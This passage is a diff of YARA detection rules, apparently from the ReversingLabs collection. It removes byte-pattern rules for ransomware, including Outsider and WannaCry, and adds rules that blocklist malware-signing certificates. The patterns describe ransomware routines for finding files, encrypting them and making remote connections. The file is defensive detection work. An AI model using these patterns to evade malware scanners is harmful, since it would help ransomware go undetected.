-            ?? E8 ?? ?? ?? ?? 8D 44 24 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24
-            ?? E8 ?? ?? ?? ?? 8D 44 24 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 33 FF 8D 74 24 ??
-            E8 ?? ?? ?? ?? 83 7C 24 ?? ?? 8B 44 24 ?? 73 ?? 8D 44 24 ?? 6A ?? 8D 4C 24 ?? 51 8D
-            4C 24 ?? 51 50 FF 15 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 0F AC C8 ?? 89 44 24 ?? 8D
-            44 24 ?? BE ?? ?? ?? ?? C1 E9 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 0F AC C8 ??
-            89 44 24 ?? 8D 44 24 ?? BE ?? ?? ?? ?? C1 E9 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 2B 44 24
-            ?? 8B 4C 24 ?? 1B 4C 24 ?? BE ?? ?? ?? ?? 0F AC C8 ?? 89 44 24 ?? 8D 44 24 ?? C1 E9
-            ?? E8 ?? ?? ?? ?? 6A ?? 33 FF 8D 74 24 ?? E8 ?? ?? ?? ?? FF 44 24 ?? 83 7C 24 ?? ??
-            0F 8C ?? ?? ?? ?? 8B 4C 24 ?? 5F 5E 5B 33 CC E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$find_files_1_p1 = {
-            6A ?? 8D 74 24 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0
-            0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 0F 85 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ??
-            E8 ?? ?? ?? ?? 59 84 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ??
-            59 84 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 0F 85
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 0F 85 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D
-            44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ??
-            ?? ?? ?? 59 84 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84
-        }
-		$find_files_1_p2 = {
-            C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 0F 85 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 0F 85 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24
-            ?? E8 ?? ?? ?? ?? 59 84 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ??
-            ?? 59 84 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 0F
-            85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 75 ?? 68 ?? ?? ??
-            ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 75 ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ??
-            ?? 59 84 C0 75 ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 75 ?? 68 ?? ??
-            ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 75 ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ??
-            ?? ?? 59 84 C0 75 ?? 83 EC ?? 8D 44 24 ?? 8B F4 50 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83
-            C4 ?? 6A ?? 33 FF 8D 74 24 ?? E8 ?? ?? ?? ?? 6A ?? 8D 74 24 ?? E8 ?? ?? ?? ?? 8D 84
-            24 ?? ?? ?? ?? 50 FF 74 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 74 24 ??
-            FF 15
-        }
-		$find_files_2_p1 = {
-            8D 44 24 ?? 8D 8C 24 ?? ?? ?? ?? 51 50 FF 15 ?? ?? ?? ?? 89 44 24 ?? 83 F8 ?? 0F 84
-            ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F
-            84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ??
-            8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ??
-            ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6
-            85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? BF ?? ?? ?? ?? 57 8D
-            84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 57 8D 84 24 ?? ?? ?? ?? 50 FF D6
-            85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84
-            24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24
-        }
-		$find_files_2_p2 = {
-            50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0
-            0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ??
-            ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 8D 44 24 ?? E8 ??
-            ?? ?? ?? 83 4C 24 ?? ?? 83 EC ?? 8B C4 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 4C
-            24 ?? 8B C4 51 E8 ?? ?? ?? ?? 59 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 84 24 ?? ??
-            ?? ?? 50 8D 44 24 ?? E8 ?? ?? ?? ?? 83 4C 24 ?? ?? 83 EC ?? 8B C4 68 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 83 EC ?? 8D 8C 24 ?? ?? ?? ?? 8B C4 51 E8 ?? ?? ?? ?? 59 E8 ?? ?? ?? ??
-            83 C4 ?? 85 C0 75 ?? 32 DB EB ?? B3 ?? F6 44 24 ?? ?? 74 ?? 83 64 24 ?? ?? 6A ?? 33
-            FF 8D 74 24 ?? E8 ?? ?? ?? ?? F6 44 24 ?? ?? 74 ?? 83 64 24 ?? ?? 6A ?? 33 FF 8D 74
-        }
-		$find_files_2_p3 = {
-            24 ?? E8 ?? ?? ?? ?? 84 DB 0F 85 ?? ?? ?? ?? F6 84 24 ?? ?? ?? ?? ?? 8D 84 24 ?? ??
-            ?? ?? 50 0F 84 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 8B F0 8B
-            46 ?? 59 83 C9 ?? 2B C8 83 F9 ?? 0F 86 ?? ?? ?? ?? 8D 58 ?? 6A ?? 8B C6 E8 ?? ?? ??
-            ?? 84 C0 74 ?? 83 7E ?? ?? 8B 4E ?? 72 ?? 8B 06 EB ?? 8B C6 6A ?? 5A 66 89 14 48 83
-            7E ?? ?? 89 5E ?? 72 ?? 8B 06 EB ?? 8B C6 33 C9 66 89 0C 58 8B DE 8D 74 24 ?? E8 ??
-            ?? ?? ?? 8B DE 8D 44 24 ?? E8 ?? ?? ?? ?? 6A ?? 33 FF E8 ?? ?? ?? ?? 6A ?? 8D 74 24
-            ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 44 24 ?? 8B F4 50 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 44
-            24 ?? 8B F4 50 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8D 44 24 ?? E8
-            ?? ?? ?? ?? 8D 44 24 ?? 50 8D 44 24 ?? E8 ?? ?? ?? ?? 59 6A ?? 33 FF 8D 74 24 ?? E8
-            ?? ?? ?? ?? 6A ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 40 33 C9 8D 74 24 ?? E8 ?? ?? ?? ?? 8D
-            84 24 ?? ?? ?? ?? 50 8D 44 24 ?? E8 ?? ?? ?? ?? 8D 44 24 ?? 50 8D 44 24 ?? E8 ?? ??
-            ?? ?? 59 6A ?? 8D 74 24 ?? E8 ?? ?? ?? ?? 6A ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 40 33 C9
-            8D 74 24 ?? E8
-        }
-		$encrypt_files_p1 = {
-            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 8B D9 33 F6 C7 43 ??
-            ?? ?? ?? ?? 89 73 ?? C6 03 ?? A1 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 57 2B C1 6A ?? 99 5F
-            F7 FF 89 9D ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? 85 C0 74 ?? 89 B5 ?? ?? ?? ?? 8B 85 ?? ??
-            ?? ?? 83 EC ?? 03 C1 8B F4 50 E8 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A
-            ?? 50 83 C8 ?? 8B F3 E8 ?? ?? ?? ?? 6A ?? 33 FF 8D 75 ?? E8 ?? ?? ?? ?? A1 ?? ?? ??
-            ?? 8B 0D ?? ?? ?? ?? 2B C1 6A ?? 99 5E F7 FE FF 85 ?? ?? ?? ?? 83 85 ?? ?? ?? ?? ??
-            39 85 ?? ?? ?? ?? 72 ?? 8B 53 ?? 6A ?? 5F C6 85 ?? ?? ?? ?? ?? 3B D7 72 ?? 8B 0B EB
-            ?? 8B CB 8B 43 ?? 03 C1 3B D7 72 ?? 8B 0B EB ?? 8B CB 50 51 8D 85 ?? ?? ?? ?? 50 8D
-            85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 39 7B ?? 72 ?? 8B 03 EB ?? 8B C3 8B 5B ?? 8B
-            B5 ?? ?? ?? ?? 03 D8 53 FF B5 ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? 8B
-            4E ?? C6 85 ?? ?? ?? ?? ?? 3B CF 72 ?? 8B 16 EB ?? 8B D6 8B 46 ?? 03 C2 3B CF 72 ??
-            8B 0E EB ?? 8B CE 50 51 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4
-            ?? 39 7E ?? 72 ?? 8B 0E EB ?? 8B CE 8B 46 ?? 03 C1 50 FF B5 ?? ?? ?? ?? 8D 9D ?? ??
-            ?? ?? 8B C6 E8 ?? ?? ?? ?? 8B 46 ?? 50 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8B 4E
-        }
-		$encrypt_files_p2 = {
-            89 85 ?? ?? ?? ?? 3B CF 72 ?? 8B 16 EB ?? 8B D6 8B 46 ?? 03 C2 3B CF 72 ?? 8B 0E EB
-            ?? 8B CE 3B C8 74 ?? 8B B5 ?? ?? ?? ?? 2B F1 8A 11 88 14 0E 41 3B C8 75 ?? 8D 45 ??
-            50 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 75 ?? 8B F8 C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            50 8D 45 ?? E8 ?? ?? ?? ?? 8B F0 8B 46 ?? 8B 56 ?? 59 59 8B 4F ?? 2B C2 3B C8 76 ??
-            8B 47 ?? 2B C1 3B C2 72 ?? 56 8B F7 E8 ?? ?? ?? ?? EB ?? 6A ?? 57 83 C8 ?? E8 ?? ??
-            ?? ?? 8B D8 8D 75 ?? E8 ?? ?? ?? ?? 8B C6 68 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 83 78 ?? ?? 59 59 72 ?? 8B 00 33 DB 53 68 ?? ?? ?? ?? 6A ?? 53 53 68 ?? ??
-            ?? ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 33 FF 8D B5 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 6A ?? 8D 75 ?? E8 ?? ?? ?? ?? 6A ?? 8D 75 ?? E8 ?? ?? ?? ?? 6A ?? 8D 75 ?? E8
-            ?? ?? ?? ?? 6A ?? 8D 75 ?? E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 3B F3 74 ?? 53 53 53 56
-            FF 15 ?? ?? ?? ?? 53 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 56 FF
-            15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ??
-            ?? 59 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? C9 C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_1_p* ) ) and ( all of ( $find_files_2_p* ) ) and ( all of ( $enum_resources_p* ) ) and ( all of ( $encrypt_files_p* ) ) and ( all of ( $remote_connection_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TIM Konstrakshn, TOV" and pe.signatures [ i ] . serial == "66:c7:58:a2:2b:fb:bc:e3:27:61:68:15:61:6d:dd:07" and 1469404800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Outsider : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_E61B0366D940896430Bcfe3E93Baac5B : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Outsider ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "44edccb1-9e2a-5ff9-b4b5-72ceec2f7947"
-		date = "2020-10-23"
-		modified = "2020-10-23"
+		id = "24eb38c1-48a5-5d9b-a42d-345c4fda6c36"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Outsider.yara#L1-L88"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "80c5a93b5b72b7b66e36f1726486b0c7620588d05bd925510d76f020a40b124c"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L15058-L15076"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "1b1fd0c2237446ab22c7359d1e89d822a4b9b6ad345447740154d7d52635c2ea"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Outsider"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files_p1 = {
-            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 8D 45 ?? 8B D9 50 6A ?? 5E 56 FF 35 ?? ?? ?? ??
-            89 5D ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 50
-            FF 15 ?? ?? ?? ?? 8B F8 89 7D ?? 85 FF 0F 84 ?? ?? ?? ?? 8D 55 ?? 89 75 ?? 8B CF 2B
-            D7 8A 04 0A 88 01 41 83 EE ?? 75 ?? 6A ?? 8D 45 ?? 50 57 56 6A ?? 56 FF 35 ?? ?? ??
-            ?? FF 15 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? 6A ?? 56 6A ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ??
-            ?? ?? 89 45 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 89 75 ?? 89 75 ?? 53 FF 15 ?? ?? ?? ?? 8D
-            04 43 83 E8 ?? 66 83 38 ?? 75 ?? FF B6 ?? ?? ?? ?? 2B C3 83 C0 ?? D1 F8 8D 04 43 50
-            FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 74 ?? FF B6 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 75 ??
-            8B F0 FF 15 ?? ?? ?? ?? 3B C6 74 ?? 8B 75 ?? 83 C6 ?? 89 75 ?? 83 FE ?? 72 ?? EB ??
-            C7 45 ?? ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF D6 50 FF 15 ?? ?? ??
-            ?? 89 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 7D ?? 8B D8 33 C0 50 8D 45 ?? 50 68 ?? ?? ??
-            ?? 53 57 FF 15 ?? ?? ?? ?? 8B 4D ?? 33 C0 89 4D ?? 3B C8 76 ?? 8B F8 8B C7 25 ?? ??
-            ?? ?? 79 ?? 48 83 C8 ?? 40 89 45 ?? 75 ?? 8B C7 99 83 E2 ?? 03 C2 C1 F8 ?? 99 52 50
-        }
-		$encrypt_files_p2 = {
-            51 51 8D 55 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 83 C4 ?? 8B 45 ?? 8A 84 05
-            ?? ?? ?? ?? 30 04 1F 47 8B C7 99 85 D2 72 ?? 77 ?? 3B C1 72 ?? 8B 4D ?? 8B 7D ?? 6A
-            ?? F7 D9 8B C1 6A ?? 99 52 50 57 FF 15 ?? ?? ?? ?? 33 C0 50 8D 45 ?? 50 FF 75 ?? 53
-            57 FF 15 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 81 7D ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 53 33
-            C0 50 FF D6 50 FF 15 ?? ?? ?? ?? 8B 7D ?? 8B 5D ?? 6A ?? 33 C0 C7 45 ?? ?? ?? ?? ??
-            50 0F 57 C0 66 0F 13 45 ?? FF 75 ?? FF 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 33 C0 50 8D
-            45 ?? 50 6A ?? 8D 45 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 33 C0 50 8D 45 ?? 50 6A ?? 57
-            FF 75 ?? FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF D6 50
-            FF 15 ?? ?? ?? ?? 8B F0 85 F6 74 ?? 68 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? 68 ?? ?? ?? ??
-            56 FF 15 ?? ?? ?? ?? 83 C4 ?? 56 53 FF 15 ?? ?? ?? ?? 56 33 F6 56 FF 15 ?? ?? ?? ??
-            50 FF 15 ?? ?? ?? ?? EB ?? 33 F6 57 56 FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 5F 5E
-            5B 8B E5 5D C3
-        }
-		$find_files = {
-            8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 53 8B 1D ?? ?? ?? ?? 56 57 68 ?? ?? ?? ?? 6A ?? FF
-            D3 50 FF 15 ?? ?? ?? ?? 8B F0 85 F6 0F 84 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 50 56 FF 15 ?? ?? ?? ?? 83 F8 ??
-            0F 84 ?? ?? ?? ?? 8B D8 33 FF FF B7 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85
-            C0 0F 84 ?? ?? ?? ?? 83 C7 ?? 83 FF ?? 72 ?? 8D 44 24 ?? 50 FF 75 ?? 68 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? A8 ?? 74 ?? 68 ?? ?? ?? ??
-            8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ??
-            ?? ?? ?? 85 C0 74 ?? 56 E8 ?? ?? ?? ?? 59 EB ?? 8B 44 24 ?? A8 ?? 74 ?? 68 ?? ?? ??
-            ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15
-            ?? ?? ?? ?? 85 C0 74 ?? 8B CE E8 ?? ?? ?? ?? 8D 44 24 ?? 50 53 FF 15 ?? ?? ?? ?? 85
-            C0 0F 85 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 83 C4 ?? 8B CE E8 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 56
-            6A ?? FF D3 50 FF 15 ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3
-        }
-		$enum_resources = {
-            55 8B EC 83 E4 ?? 83 EC ?? 83 0C 24 ?? 8D 44 24 ?? 53 56 57 50 FF 75 ?? C7 44 24 ??
-            ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 44 24 ??
-            83 C0 ?? 50 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F8 85 FF 74 ?? EB ?? 33
-            DB 39 5C 24 ?? 76 ?? 8D 77 ?? F6 46 ?? ?? 74 ?? 8D 46 ?? 50 E8 ?? ?? ?? ?? EB ?? FF
-            36 E8 ?? ?? ?? ?? 43 83 C6 ?? 59 3B 5C 24 ?? 72 ?? 8D 44 24 ?? 50 57 8D 44 24 ?? 50
-            FF 74 24 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 57 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ??
-            ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $enum_resources ) and ( $find_files ) and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TRANS LTD" and ( pe.signatures [ i ] . serial == "00:e6:1b:03:66:d9:40:89:64:30:bc:fe:3e:93:ba:ac:5b" or pe.signatures [ i ] . serial == "e6:1b:03:66:d9:40:89:64:30:bc:fe:3e:93:ba:ac:5b" ) and 1528156800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Win32_Ransomware_Wannacry : TC_DETECTION MALICIOUS MALWARE FILE
+rule REVERSINGLABS_Cert_Blocklist_6294B8Acc35Dea7D32A95Ac5D4536F8F : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects WannaCry ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "61734d47-2525-5e3a-94b4-60493dfe2b93"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "bc380123-20fc-55de-ad1c-4f13ac173cc9"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.WannaCry.yara#L3-L135"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "fed58b533a9f7c3eb1b3e4f8fbe1f519aab94d1c066ae6937c21876693be0eac"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L15078-L15094"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "ac92ff8e533121071a620ca5280ae66629576f9c4af9831ddac5bb487e4348af"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "WannaCry"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$main_1 = {
-            A0 ?? ?? ?? ?? 56 57 6A ?? 88 85 ?? ?? ?? ?? 59 33 C0 8D BD ?? ?? ?? ?? F3 AB 66 AB
-            AA 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8D 85
-            ?? ?? ?? ?? 6A ?? 50 FF D6 59 85 C0 59 74 ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 FF D6 59 88
-            18 59 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 59 59
-            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 53 53 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 5F 5E 85
-            C0 74 ?? 8D 45 ?? 8D 8D ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 89 5D
-        }
-		$main_2 = {
-            68 ?? ?? ?? ?? 33 DB 50 53 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 FF 15
-            ?? ?? ?? ?? 83 38 ?? 75 ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 00 FF 70 ?? E8 ?? ??
-            ?? ?? 59 85 C0 59 75 ?? 53 E8 ?? ?? ?? ?? 85 C0 59 74 ?? BE ?? ?? ?? ?? 53 8D 85 ??
-            ?? ?? ?? 56 50 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 83 F8 ?? 74 ?? E8 ?? ?? ?? ??
-            85 C0 0F 85 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 FF D6 59 85 C0
-            59 74 ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 FF D6 59 88 18 59 8D 85 ?? ?? ?? ?? 50 FF 15 ??
-            ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            53 53 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 53 68 ?? ?? ?? ?? E8
-        }
-		$main_3 = {
